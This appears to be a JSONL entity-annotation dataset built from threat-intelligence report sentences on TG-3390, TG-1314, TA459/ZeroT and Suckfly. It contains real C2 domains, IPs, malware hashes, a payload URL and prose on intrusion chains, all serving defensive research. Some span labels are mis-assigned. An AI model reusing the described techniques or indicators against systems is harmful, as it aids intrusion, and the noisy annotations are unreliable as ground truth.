{"text": "Search web log files for evidence of web server scanning using the URIs listed in the Exploitation section and evidence of Exfiltration using the User-Agent in the Actions on objective section .", "spans": [{"start": 146, "end": 156, "label": "System"}]}
{"text": "Require two-factor authentication for all remote access solutions , including OWA .", "spans": [{"start": 78, "end": 81, "label": "System"}]}
{"text": "Audit ISAPI filters and search for web shells on Microsoft Exchange servers .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 49, "end": 58, "label": "Organization"}, {"start": 59, "end": 67, "label": "System"}]}
{"text": "CTU researchers infer intent by aggregating observations , analyzing a threat group's activity , and placing the information in a wider context .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 43, "end": 68, "label": "System"}, {"start": 71, "end": 75, "label": "System"}]}
{"text": "CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}]}
{"text": "Most websites compromised by TG-3390 actors are affiliated with five types of organizations around the world :", "spans": [{"start": 29, "end": 36, "label": "Organization"}]}
{"text": "large manufacturing companies , particularly those supplying defense organizations , energy companies , embassies in Washington , DC representing countries in the Middle East , Europe , and Asia , likely to target U.S. based users involved in international relations , non-governmental organizations ( NGOs ) , particularly those focused on international relations and defense , government organizations .", "spans": [{"start": 130, "end": 132, "label": "Organization"}]}
{"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}]}
{"text": "To assess attribution , CTU researchers analyze observed activity , third-party reporting , and contextual intelligence .", "spans": [{"start": 24, "end": 27, "label": "Organization"}]}
{"text": "For the following reasons , CTU researchers assess with moderate confidence that TG-3390 has a Chinese nexus :", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 81, "end": 88, "label": "Organization"}]}
{"text": "The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 4, "end": 7, "label": "System"}]}
{"text": "Threat groups outside of China are unlikely to target the Uyghur people .", "spans": []}
{"text": "TG-3390 uses the PlugX remote access tool .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 22, "label": "Malware"}]}
{"text": "The menus for PlugX 's server-side component are written exclusively in Standard Chinese ( Mandarin ) , suggesting that PlugX operators are familiar with this language .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 72, "end": 88, "label": "System"}, {"start": 91, "end": 99, "label": "System"}, {"start": 120, "end": 125, "label": "Malware"}]}
{"text": "CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}]}
{"text": "The timeframe maps to the second half of the workday in China .", "spans": []}
{"text": "The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": [{"start": 32, "end": 37, "label": "System"}]}
{"text": "CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "CTU researchers recognize that the evidence supporting this attribution is circumstantial .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "It is possible that TG-3390 is false-flag operation by a threat group outside of China that is deliberately planting indications of a Chinese origin .", "spans": [{"start": 20, "end": 27, "label": "Organization"}]}
{"text": "TG-3390 has access to proprietary tools , some of which are used exclusively by TG-3390 and others that are shared among a few Chinese threat groups .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}]}
{"text": "The complexity and continual development of these tools indicates a mature development process .", "spans": []}
{"text": "TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "This ability is further demonstrated by analysis of interactions between TG-3390 operators and a target environment .", "spans": [{"start": 73, "end": 80, "label": "Organization"}]}
{"text": "CTU researchers found no evidence of multiple operators working simultaneously against a single organization .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "This efficiency of operation ( a 1:1 ratio of operator to observed activity ) suggests that TG-3390 can scale to conduct the maximum number of simultaneous operations .", "spans": [{"start": 92, "end": 99, "label": "Organization"}]}
{"text": "These characteristics suggest that the threat group is well resourced and has access to a tools development team and a team focused on SWCs .", "spans": [{"start": 135, "end": 139, "label": "System"}]}
{"text": "TG-3390 's obfuscation techniques in SWCs complicate detection of malicious web traffic redirects .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 37, "end": 41, "label": "System"}]}
{"text": "Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": []}
{"text": "CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 105, "end": 113, "label": "System"}, {"start": 160, "end": 189, "label": "System"}, {"start": 192, "end": 195, "label": "System"}]}
{"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}, {"start": 114, "end": 122, "label": "Vulnerability"}]}
{"text": "The threat actors demonstrated the ability to adapt when reentering a network after an eviction , overcoming technical barriers constructed by network defenders .", "spans": []}
{"text": "In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": [{"start": 21, "end": 25, "label": "System"}, {"start": 70, "end": 77, "label": "Organization"}, {"start": 97, "end": 103, "label": "System"}]}
{"text": "CTU researchers assess with high confidence that the threat actors follow an established playbook during an intrusion .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "They quickly move away from their initial access vector to hide their entry point and then target Exchange servers as a new access vector .", "spans": []}
{"text": "As of this publication , CTU researchers have not discovered how TG-3390 keeps track of the details associated with its compromised assets and credentials .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 65, "end": 72, "label": "Organization"}]}
{"text": "However , the threat actors' ability to reuse these assets and credentials , sometimes weeks or months after the initial compromise , indicates the group is disciplined and well organized .", "spans": []}
{"text": "After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": [{"start": 70, "end": 73, "label": "Organization"}, {"start": 88, "end": 95, "label": "Organization"}]}
{"text": "TG-3390 : american.blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 31, "label": "Indicator"}]}
{"text": "TG-3390 : api.apigmail.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 26, "label": "Indicator"}]}
{"text": "TG-3390 : apigmail.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]}
{"text": "TG-3390 : backup.darkhero.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 29, "label": "Indicator"}]}
{"text": "TG-3390 : bel.updatawindows.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 31, "label": "Indicator"}]}
{"text": "TG-3390 : binary.update-onlines.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 35, "label": "Indicator"}]}
{"text": "TG-3390 : blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]}
{"text": "TG-3390 : castle.blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 29, "label": "Indicator"}]}
{"text": "TG-3390 : ctcb.blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 27, "label": "Indicator"}]}
{"text": "TG-3390 : darkhero.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]}
{"text": "TG-3390 : 208.115.242.36 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]}
{"text": "TG-3390 : 208.115.242.37 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]}
{"text": "TG-3390 : 208.115.242.38 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]}
{"text": "TG-3390 : 66.63.178.142 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]}
{"text": "TG-3390 : 72.11.148.220 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]}
{"text": "TG-3390 : 72.11.141.133 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]}
{"text": "TG-3390 : 74.63.195.236 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]}
{"text": "TG-3390 : 74.63.195.237 . 1cb4b74e9d030afbb18accf6ee2bfca1 MD5 hash HttpBrowser RAT dropper . b333b5d541a0488f4e710ae97c46d9c2 MD5 hash HttpBrowser RAT dropper . 86a05dcffe87caf7099dda44d9ec6b48 MD5 hash HttpBrowser RAT dropper . 93e40da0bd78bebe5e1b98c6324e9b5b MD5 hash HttpBrowser RAT dropper . f43d9c3e17e8480a36a62ef869212419 MD5 hash HttpBrowser RAT dropper . 57e85fc30502a925ffed16082718ec6c MD5 hash HttpBrowser RAT dropper . 4251aaf38a485b08d5562c6066370f09 MD5 hash HttpBrowser RAT dropper . bbfd1e703f55ce779b536b5646a0cdc1 MD5 hash HttpBrowser RAT dropper . 12a522cb96700c82dc964197adb57ddf MD5 hash HttpBrowser RAT dropper . 728e5700a401498d91fb83159beec834 MD5 hash HttpBrowser RAT dropper . 2bec1860499aae1dbcc92f48b276f998 MD5 hash HttpBrowser RAT dropper . 014122d7851fa8bf4070a8fc2acd5dc5 MD5 hash HttpBrowser RAT . 0ae996b31a2c3ed3f0bc14c7a96bea38 MD5 hash HttpBrowser RAT . 1a76681986f99b216d5c0f17ccff2a12 MD5 hash HttpBrowser RAT . 380c02b1fd93eb22028862117a2f19e3 MD5 hash HttpBrowser RAT . 40a9a22da928cbb70df48d5a3106d887 MD5 hash HttpBrowser RAT . 46cf2f9b4a4c35b62a32f28ac847c575 MD5 hash HttpBrowser RAT . 5436c3469cb1d87ea404e8989b28758d MD5 hash HttpBrowser RAT . 692cecc94ac440ec673dc69f37bc0409 MD5 hash HttpBrowser RAT .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}, {"start": 26, "end": 58, "label": "Indicator"}, {"start": 68, "end": 79, "label": "Malware"}, {"start": 94, "end": 126, "label": "Indicator"}, {"start": 136, "end": 147, "label": "Malware"}, {"start": 162, "end": 194, "label": "Indicator"}, {"start": 204, "end": 215, "label": "Malware"}, {"start": 230, "end": 262, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Malware"}, {"start": 298, "end": 330, "label": "Indicator"}, {"start": 340, "end": 351, "label": "Malware"}, {"start": 366, "end": 398, "label": "Indicator"}, {"start": 408, "end": 419, "label": "Malware"}, {"start": 434, "end": 466, "label": "Indicator"}, {"start": 476, "end": 487, "label": "Malware"}, {"start": 502, "end": 534, "label": "Indicator"}, {"start": 544, "end": 555, "label": "Malware"}, {"start": 570, "end": 602, "label": "Indicator"}, {"start": 612, "end": 623, "label": "Malware"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 680, "end": 691, "label": "Malware"}, {"start": 706, "end": 738, "label": "Indicator"}, {"start": 748, "end": 759, "label": "Malware"}, {"start": 774, "end": 806, "label": "Indicator"}, {"start": 816, "end": 827, "label": "Malware"}, {"start": 834, "end": 866, "label": "Indicator"}, {"start": 876, "end": 887, "label": "Malware"}, {"start": 894, "end": 926, "label": "Indicator"}, {"start": 936, "end": 947, "label": "Malware"}, {"start": 954, "end": 986, "label": "Indicator"}, {"start": 996, "end": 1007, "label": "Malware"}, {"start": 1014, "end": 1046, "label": "Indicator"}, {"start": 1056, "end": 1067, "label": "Malware"}, {"start": 1074, "end": 1106, "label": "Indicator"}, {"start": 1116, "end": 1127, "label": "Malware"}, {"start": 1134, "end": 1166, "label": "Indicator"}, {"start": 1176, "end": 1187, "label": "Malware"}, {"start": 1194, "end": 1226, "label": "Indicator"}, {"start": 1236, "end": 1247, "label": "Malware"}]}
{"text": "Living Off the Land .", "spans": []}
{"text": "Release_Time : 2015-05-28", "spans": []}
{"text": "Report_URL : https://www.secureworks.com/blog/living-off-the-land", "spans": []}
{"text": "In over half of the targeted threat response engagements performed by the Dell SecureWorks Counter Threat Unit Special Operations ( CTU-SO ) team in the past year , the threat actors accessed the target environment using compromised credentials and the companies' own virtual private network ( VPN ) or other remote access solutions .", "spans": [{"start": 74, "end": 129, "label": "Organization"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 268, "end": 291, "label": "System"}, {"start": 294, "end": 297, "label": "System"}]}
{"text": "Detecting threat actors who are \" living off the land , \" using credentials , systems , and tools they collect along the way instead of backdoors , can be challenging for organizations that focus their instrumentation and controls primarily on the detection of malware and indicators such as command and control IP addresses , domains , and protocols .", "spans": []}
{"text": "With their gaps in visibility , these organizations can have a very difficult time distinguishing adversary activity from that of legitimate users , pushing detection times out to weeks , months , or even years .", "spans": []}
{"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 ( TG-1314 ) , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": [{"start": 11, "end": 14, "label": "Organization"}, {"start": 68, "end": 85, "label": "Organization"}, {"start": 88, "end": 95, "label": "Organization"}]}
{"text": "In this case , the threat actors used compromised credentials to log into an Internet-facing Citrix server to gain access to the network .", "spans": [{"start": 77, "end": 92, "label": "System"}, {"start": 93, "end": 99, "label": "System"}]}
{"text": "CTU researchers discovered evidence that the threat actors were not only leveraging the company 's remote access infrastructure , but were also using the company 's endpoint management platform , Altiris , to move laterally through the network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 196, "end": 203, "label": "System"}]}
{"text": "Memory collection and analysis can be an extremely valuable component of an incident response plan and in this case proved crucial in identifying TG-1314 's actions on objective .", "spans": [{"start": 146, "end": 153, "label": "Organization"}]}
{"text": "Memory collected from systems involved in the intrusion was analyzed using the Volatility framework .", "spans": []}
{"text": "First , Volatility 's pstree plugin , which lists running processes in a tree view , was executed .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 22, "end": 28, "label": "System"}, {"start": 29, "end": 35, "label": "System"}]}
{"text": "The result immediately revealed signs of a suspicious cmd.exe process running as a child of the ACLIENT.EXE process .", "spans": [{"start": 54, "end": 61, "label": "Indicator"}, {"start": 96, "end": 107, "label": "Indicator"}]}
{"text": "CTU researchers immediately recognized suspicious commands , such as changing the working directory to recycler and executing commands from that location , that were unlikely to have been connected to legitimate system administrator operations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "The results also revealed indications that PsExec , a popular system administration tool for executing commands on remote systems , was run against several target hosts to spawn shells on them .", "spans": [{"start": 43, "end": 49, "label": "System"}]}
{"text": "To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 97, "end": 100, "label": "Organization"}, {"start": 122, "end": 129, "label": "Indicator"}]}
{"text": "While cmd.exe is a console application , it still requires GUI like functionality and other support to interact with the operating system .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 59, "end": 62, "label": "System"}]}
{"text": "On the Windows XP platform , this support is provided by the csrss.exe process .", "spans": [{"start": 7, "end": 17, "label": "System"}, {"start": 61, "end": 70, "label": "Indicator"}]}
{"text": "Because commands run from cmd.exe are acted on by csrss.exe , additional evidence of command history and responses sent to the cmd console window are often discoverable by analyzing the csrss.exe process 's memory .", "spans": [{"start": 26, "end": 33, "label": "Indicator"}, {"start": 50, "end": 59, "label": "Indicator"}, {"start": 186, "end": 195, "label": "Indicator"}]}
{"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss.exe process to be 716 .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 59, "end": 68, "label": "Indicator"}]}
{"text": "Running Volatility 's vaddump plugin on this process allowed CTU researchers to obtain the Virtual Address Descriptor ( VAD ) sections .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 22, "end": 29, "label": "System"}, {"start": 30, "end": 36, "label": "System"}, {"start": 61, "end": 64, "label": "Organization"}, {"start": 91, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]}
{"text": "The relevant strings inside the VAD sections were UTF-16 encoded and revealed additional insights once extracted .", "spans": [{"start": 32, "end": 35, "label": "System"}, {"start": 50, "end": 56, "label": "System"}]}
{"text": "TG-1314 was mapping network drives using a compromised Altiris account to connect to additional systems .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 55, "end": 62, "label": "System"}]}
{"text": "After identifying compromised credentials and executed commands , CTU researchers shifted focus to determine how the threat actors were obtaining the shell and executing their commands on the compromised host .", "spans": [{"start": 66, "end": 69, "label": "Organization"}]}
{"text": "This exploration required a look at the suspect cmd.exe 's parent process , shown earlier in the investigation to be ACLIENT.EXE .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 117, "end": 128, "label": "Indicator"}]}
{"text": "Volatility 's procdump command was used to dump the executable from memory .", "spans": [{"start": 0, "end": 10, "label": "System"}]}
{"text": "Running the strings utility against the dumped ACLIENT.EXE binary revealed evidence that the file was the Altiris agent .", "spans": [{"start": 47, "end": 58, "label": "Indicator"}, {"start": 106, "end": 113, "label": "System"}]}
{"text": "These results indicated that the threat actors leveraged the Altiris management platform installed at the client site , along with compromised domain credentials associated with the Altiris system , to move laterally within the compromised environment .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 182, "end": 189, "label": "System"}]}
{"text": "Threat groups often follow a path of least resistance to achieve their objective .", "spans": []}
{"text": "They will leverage legitimate remote access solutions for entry and valid system administrator tools for lateral movement , if possible .", "spans": []}
{"text": "To help disrupt this tactic , it is important that organizations implement two-factor authentication for all remote access solutions and consider doing the same for internal , high-value assets like their internal system management consoles .", "spans": []}
{"text": "CTU researchers assess with high confidence that threat groups like TG-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 68, "end": 75, "label": "Organization"}]}
{"text": "APT Targets Financial Analysts with CVE-2017-0199 .", "spans": [{"start": 36, "end": 49, "label": "Vulnerability"}]}
{"text": "On April 20 , Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries .", "spans": [{"start": 14, "end": 24, "label": "Organization"}]}
{"text": "These analysts were linked by their coverage of the telecommunications industry , making this targeting very similar to , and likely a continuation of , activity described in our \u201c In Pursuit of Optical Fibers and Troop Intel \u201d blog .", "spans": []}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 70, "end": 76, "label": "System"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 94, "end": 98, "label": "System"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 175, "label": "Malware"}, {"start": 176, "end": 182, "label": "Malware"}, {"start": 214, "end": 219, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]}
{"text": "Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": [{"start": 77, "end": 82, "label": "Organization"}]}
{"text": "The actor typically targets Central Asian countries , Russia , Belarus , Mongolia , and others .", "spans": []}
{"text": "TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 52, "end": 57, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 78, "end": 83, "label": "Malware"}]}
{"text": "In this blog , we also document other 2017 activity so far by this attack group , including their distribution of ZeroT malware and secondary payloads PCrat S-VULNAME/Gh0st .", "spans": [{"start": 114, "end": 119, "label": "Malware"}, {"start": 151, "end": 172, "label": "Vulnerability"}]}
{"text": "In this campaign , attackers used a Microsoft Word document called 0721.doc , which exploits CVE-2017-0199 .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 46, "end": 50, "label": "System"}, {"start": 67, "end": 75, "label": "Indicator"}, {"start": 93, "end": 106, "label": "Vulnerability"}]}
{"text": "This vulnerability was disclosed and patched days prior to this attack .", "spans": []}
{"text": "The document uses the logic flaw to first download the file power.rtf from http://122.9.52.215/news/power.rtf .", "spans": [{"start": 60, "end": 69, "label": "Indicator"}, {"start": 75, "end": 109, "label": "Indicator"}]}
{"text": "The payload is actually an HTML Application ( HTA ) file , not an RTF document .", "spans": [{"start": 27, "end": 31, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 66, "end": 69, "label": "System"}]}
{"text": "The HTA \u2019s VBScript changes the window size and location and then uses PowerShell to download yet another script : power.ps1 .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 11, "end": 19, "label": "System"}, {"start": 32, "end": 38, "label": "System"}, {"start": 71, "end": 81, "label": "System"}, {"start": 115, "end": 124, "label": "Indicator"}]}
{"text": "This is a PowerShell script that downloads and runs the ZeroT payload cgi.exe .", "spans": [{"start": 10, "end": 20, "label": "System"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 70, "end": 77, "label": "Indicator"}]}
{"text": "The attack group has made incremental changes to ZeroT since our last analysis .", "spans": [{"start": 49, "end": 54, "label": "Malware"}]}
{"text": "While they still use RAR SFX format for the initial payloads , ZeroT now uses a the legitimate McAfee utility ( SHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe ) named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past .", "spans": [{"start": 21, "end": 24, "label": "System"}, {"start": 25, "end": 28, "label": "System"}, {"start": 63, "end": 68, "label": "Malware"}, {"start": 95, "end": 101, "label": "Organization"}, {"start": 119, "end": 183, "label": "Indicator"}, {"start": 192, "end": 200, "label": "Indicator"}, {"start": 216, "end": 236, "label": "Organization"}]}
{"text": "The encrypted ZeroT payload , named Mctl.mui , is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 36, "end": 44, "label": "Indicator"}, {"start": 99, "end": 101, "label": "System"}, {"start": 158, "end": 163, "label": "Malware"}]}
{"text": "Once ZeroT is running , we observed that the fake User-Agent used in the requests changed from \u201c Mozilla/6.0 ( compatible ; MSIE 10.0 ; Windows NT 6.2 ; Tzcdrnt/6.0 ) \u201d to \u201c Mozilla/6.0 ( compatible ; MSIE 11.0 ; Windows NT 6.2 ) \u201d , thus removing the \u201c Tzcdrnt \u201d typo observed in previous versions .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 213, "end": 220, "label": "System"}]}
{"text": "The initial beacon to index.php changed to index.txt but ZeroT still expects an RC4 encrypted response using a static key : \u201c (*^GF (9042&* \u201d .", "spans": [{"start": 22, "end": 31, "label": "Indicator"}, {"start": 43, "end": 52, "label": "Indicator"}, {"start": 57, "end": 62, "label": "Malware"}]}
{"text": "Next , ZeroT uses HTTP beacons to transmit information about the infected system to the command and control ( C&C ) .", "spans": [{"start": 7, "end": 12, "label": "Malware"}, {"start": 18, "end": 22, "label": "Indicator"}, {"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 113, "label": "System"}]}
{"text": "All posts are encrypted , unlike the last time we analyzed a sample from this actor , when the first POST was accidentally not encrypted .", "spans": []}
{"text": "After that , stage 2 payloads are still retrieved as Bitmap ( BMP ) images that use Least Significant Bit ( LSB ) Steganography to hide the real payloads .", "spans": [{"start": 53, "end": 59, "label": "System"}, {"start": 62, "end": 65, "label": "System"}, {"start": 68, "end": 74, "label": "System"}, {"start": 84, "end": 105, "label": "System"}, {"start": 108, "end": 111, "label": "System"}, {"start": 114, "end": 127, "label": "System"}]}
{"text": "These images appear normal in image viewers .", "spans": [{"start": 6, "end": 12, "label": "System"}, {"start": 30, "end": 35, "label": "System"}]}
{"text": "The stage 2 payload was PlugX that beaconed to C&C servers www.icefirebest.com and www.icekkk.net .", "spans": [{"start": 24, "end": 29, "label": "Malware"}, {"start": 47, "end": 50, "label": "System"}, {"start": 59, "end": 78, "label": "Indicator"}, {"start": 83, "end": 97, "label": "Indicator"}]}
{"text": "Throughout 2017 we observed this threat actor actively attempting to compromise victims with various malware payloads .", "spans": []}
{"text": "ZeroT remained the primary stage 1 payload , but the stage 2 payloads varied .", "spans": [{"start": 0, "end": 5, "label": "Malware"}]}
{"text": "One such interesting example was \u201c \u041f\u041b\u0410\u041d_\u0420\u0415\u0410\u041b\u0418\u0417\u0410\u0426\u0418\u0418_\u041f\u0420\u041e\u0415\u041a\u0422\u0410.rar \u201d ( SHA256 b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda ) .", "spans": [{"start": 35, "end": 62, "label": "Indicator"}, {"start": 74, "end": 138, "label": "Indicator"}]}
{"text": "Translated from Russian , this file is named \u201c PROJECT_REALIZATION_PLAN.rar \u201d and contains a compressed .scr executable .", "spans": [{"start": 47, "end": 75, "label": "Indicator"}, {"start": 104, "end": 108, "label": "Indicator"}]}
{"text": "This ZeroT executable communicated with the C&C domain www.kz-info.net and downloaded PlugX as well as an additional PCRat S-VULNAME/Gh0st Trojan which communicated with the www.ruvim.net C&C server .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 44, "end": 47, "label": "System"}, {"start": 55, "end": 70, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 117, "end": 138, "label": "Vulnerability"}, {"start": 139, "end": 145, "label": "Malware"}, {"start": 174, "end": 187, "label": "Indicator"}, {"start": 188, "end": 191, "label": "System"}]}
{"text": "PCRat S-VULNAME/Gh0st is a payload that we do not see this group using frequently .", "spans": [{"start": 0, "end": 21, "label": "Vulnerability"}]}
{"text": "Another interesting ZeroT sample ( SHA256 bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374 ) contained the executable 0228.exe and a decoy document 0228.doc in the RAR SFX archive .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 42, "end": 106, "label": "Indicator"}, {"start": 134, "end": 142, "label": "Indicator"}, {"start": 164, "end": 172, "label": "Indicator"}, {"start": 180, "end": 183, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]}
{"text": "Bundling decoy documents is a common tactic by this group .", "spans": []}
{"text": "RAR SFX directives are used to display the decoy while the malicious payload is executed .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 4, "end": 7, "label": "System"}]}
{"text": "We suspect that this specific lure was copied from the news article http://www.cis.minsk.by/news.php?id=7557 .", "spans": [{"start": 68, "end": 108, "label": "Indicator"}]}
{"text": "TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "However , their strategy , tactics , techniques , and procedures in this particular attack emphasize the importance of rigorous patching regimens for all organizations .", "spans": []}
{"text": "Even as software vulnerabilities often take a back seat to human exploits and social engineering , robust defenses must include protection at the email gateway , proactive patch management , and thoughtful end user education .", "spans": [{"start": 146, "end": 151, "label": "System"}]}
{"text": "Paying attention to the details of past attacks is also an important means of preparing for future attacks .", "spans": []}
{"text": "Noting who is targeted , with what malware , and with what types of lures provide clues with which organizations can improve their security posture .", "spans": []}
{"text": "At the same time , multinational organizations like the financial services firms targeted here must be acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks .", "spans": []}
{"text": "Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": [{"start": 41, "end": 46, "label": "Organization"}]}
{"text": "Suckfly : Revealing the secret life of your code signing certificates .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Release_Time : 2016-03-15 Report_URL : https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "spans": []}
{"text": "In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 15, "end": 23, "label": "Organization"}]}
{"text": "Normally , this is considered a low-level alert easily defeated by security software .", "spans": []}
{"text": "In this case , however , the hacktool had an unusual characteristic not typically seen with this type of file ; it was signed with a valid code-signing certificate .", "spans": []}
